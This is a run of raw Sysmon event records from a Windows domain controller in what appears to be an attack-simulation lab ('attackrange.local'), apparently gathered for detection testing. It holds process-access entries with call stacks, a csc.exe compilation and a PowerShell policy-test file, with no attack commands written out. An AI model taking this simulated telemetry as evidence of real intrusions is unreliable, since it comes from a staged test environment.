13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857F-5FCF-A300-000000009101}4596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.069{10ACEC4A-857E-5FCF-A200-000000009101}33764608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-857F-5FCF-A300-000000009101}4596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.075{10ACEC4A-857F-5FCF-A300-000000009101}4596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES10D3.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC4DFFD1BD599C415F96E19E668A6899.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ugdo1hjh.cmdline" 10341000x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.023{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.023{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.023{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.958{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.958{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.911{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_aolcacav.13x.ps12020-12-08 13:54:08.911 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.896{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.880{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 